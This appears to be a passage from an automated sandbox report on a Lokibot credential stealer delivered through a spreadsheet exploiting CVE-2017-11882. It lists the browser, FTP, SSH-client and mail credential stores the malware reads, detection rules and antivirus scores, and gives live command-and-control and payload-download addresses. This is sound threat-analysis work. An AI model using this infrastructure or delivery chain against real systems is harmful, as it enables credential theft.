Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 2216 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\vbc.exe TID: 2280 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mspaint.exe TID: 2256 | Thread sleep time: -15960000s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 3_2_00403D74

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0154278E rdtsc 3_2_0154278E
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h] 3_2_0040317B
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0154202E mov eax, dword ptr fs:[00000030h] 3_2_0154202E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap, 3_2_00402B7C
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\vbc.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 3_2_0154278E cpuid 3_2_0154278E
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\vbc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\data.xml VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.db VolumeInformation
Queries the cryptographic machine GUID
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1054527862.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2276, type: MEMORY
Source: Yara match | File source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.db
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.db
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.db
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Roaming\vbc.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: PopPassword 3_2_0040D069
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: SmtpPassword 3_2_0040D069

Malware Configuration

Threatname: Lokibot

{"c2:": "http://cpf-th.com/dark/five/fre.php"}

Behavior Graph

[Behavior graph image not reproduced; legend items: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet]
Simulations

Behavior and APIs

Time | Type | Description
13:20:31 | API Interceptor | 171x Sleep call for process: EQNEDT32.EXE modified
13:20:38 | API Interceptor | 172x Sleep call for process: vbc.exe modified
13:20:38 | API Interceptor | 621x Sleep call for process: mspaint.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
F-A Payment 20-26 force.xlsx | 38% | Virustotal | -
F-A Payment 20-26 force.xlsx | 24% | ReversingLabs | Win32.Exploit.CVE-2017-11882

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\vbc.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe | 25% | Virustotal | -

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
cpf-th.com | 8% | Virustotal | -
green9wsdyelectronicsandkitchenappliance.duckdns.org | 4% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://cpf-th.com/dark/five/fre.php | 12% | Virustotal | -
http://cpf-th.com/dark/five/fre.php | 0% | Avira URL Cloud | safe
http://www.ibsensoftware.com/ | 1% | Virustotal | -
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://green9wsdyelectronicsandkitchenappliance.duckdns.org/office360/regasm.exe | 3% | Virustotal | -
http://green9wsdyelectronicsandkitchenappliance.duckdns.org/office360/regasm.exe | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000003.00000003.1039184291.02160000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000003.00000003.1039184291.02160000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000003.00000003.1039184291.02160000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x1301f:$des3: 68 03 66 00 00
  • 0x17410:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174dc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.1054527862.00415000.00000002.00020000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000003.00000002.1054527862.00415000.00000002.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
Process Memory Space: vbc.exe PID: 2276 | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
Process Memory Space: vbc.exe PID: 2276 | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security

Unpacked PEs

Source | Rule | Description | Author
3.2.vbc.exe.400000.2.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
3.2.vbc.exe.400000.2.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
3.2.vbc.exe.400000.2.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.vbc.exe.400000.2.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vbc.exe, NewProcessName: C:\Users\user\AppData\Roaming\vbc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1544, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , ProcessId: 2276
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.133.106.239, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1544, Protocol: tcp, SourceIp: 192.168.2.2, SourceIsIpv6: false, SourcePort: 49158
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ProcessId: 1544, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
185.147.80.213 | F-A Payment 20-26 force.xlsx | malicious
  • cpf-th.com/dark/five/fre.php
45.143.138.47 | F-A Payment 20-26 force.xlsx | malicious
  • cpf-th.com/dark/five/fre.php
103.133.106.239 | F-A Payment 20-26 force.xlsx | malicious
  • green9wsdyelectronicsandkitchenappliance.duckdns.org/office360/regasm.exe

Domains

Match | Associated Sample Name / URL | Detection | Context
green9wsdyelectronicsandkitchenappliance.duckdns.org | F-A Payment 20-26 force.xlsx | malicious
  • 103.133.106.239

ASN

Match: unknown
Associated Sample Name / URL | Detection | Context
Yu4pbQtaWS.doc | malicious
  • 52.114.74.44
http://www.is-two.biz/script/ChannelRegister.php | malicious
  • 195.22.26.248
OGa0dC4QVI.exe | malicious
  • 198.58.119.85
https://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Ft.e.vailresorts.com%2Fr%2F%3Fid%3Dh136d0d7a%2C40a0676%2C40a3cb9%26p1%3Ds0na.blob.core.windows.net%252Fbhu%252FXp2.html%2523YnJldHQud29sbGVuQHZ5YWlyZS5jb20%3D&data=02%7C01%7CGMB-GLB-Phishing%40vyaire.com%7C53dd4ab2e44f427fbf0d08d7cbee0d30%7C67cf4ad46a1a4a019dfeaf94c1adbc07%7C0%7C0%7C637202095592205657&sdata=VajxY34sWJ%2FgjNyjauh9wFBU4qqN8XgEXXAl6c9voGM%3D&reserved=0 | malicious
  • 52.239.232.36
F-A Payment 20-26 force.xlsx | malicious
  • 127.0.0.1
DOC Q0017 - 3512C.html | malicious
  • 23.253.181.252
CCF202018038477.html | malicious
  • 52.87.111.218
job_attach_c9v.js | malicious
  • 8.209.72.245
http://www.is-two.biz/ | malicious
  • 195.22.26.248
xYwmyCik8i.doc | malicious
  • 52.114.6.46
AML_Presentation_March_2020_pdf.jar | malicious
  • 79.143.87.146
AML_Presentation_March_2020_pdf.jar | malicious
  • 79.143.87.146
DAWOOENC LNG RFQ PACKAGEDOCUMENTS.exe | malicious
  • 52.213.114.86
COVID 19 Relief.doc | malicious
  • 209.141.54.161
https://bjru.us17.list-manage.com/track/click?u=05866771f816c6ee662dd8649&id=501ae5cfeb&e=6668efedce | malicious
  • 13.224.96.50
eCzadGXtGI.exe | malicious
  • 31.44.184.50
VOUCHER Kontik.ppam | malicious
  • 186.243.111.60
VOUCHER Kontik.ppam | malicious
  • 186.243.111.60
Christmass.exe | malicious
  • 192.168.2.232
Doc n#U00b058357_202003186781.xls | malicious
  • 47.252.85.163

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Roaming\vbc.exe | F-A Payment 20-26 force.xlsx | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe | F-A Payment 20-26 force.xlsx | malicious
